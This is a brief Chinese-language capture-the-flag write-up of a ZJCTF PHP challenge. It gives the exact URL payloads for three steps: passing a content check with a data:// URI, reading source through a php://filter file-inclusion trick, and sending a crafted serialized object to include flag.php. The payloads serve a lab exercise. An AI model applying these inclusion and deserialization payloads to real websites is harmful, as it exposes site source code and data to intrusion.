打开主界面就是这个亚子 传入一个文件文件内容为 welcome to the zjctf 可以使用php伪协议或者data伪协议
?text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=绕过了第一层 随后,下面包含了一个文件,利用php伪协议查看一下useless.php的内容
file=php://filter/read=convert.base64-encode/resource=useless.php输入以后,出现内容 将内容解码 随后将password进行序列化 随后输入
?text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=&file=useless.php&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}查看页面源代码发现flag 参考链接: https://www.cnblogs.com/gaonuoqi/p/12255777.html
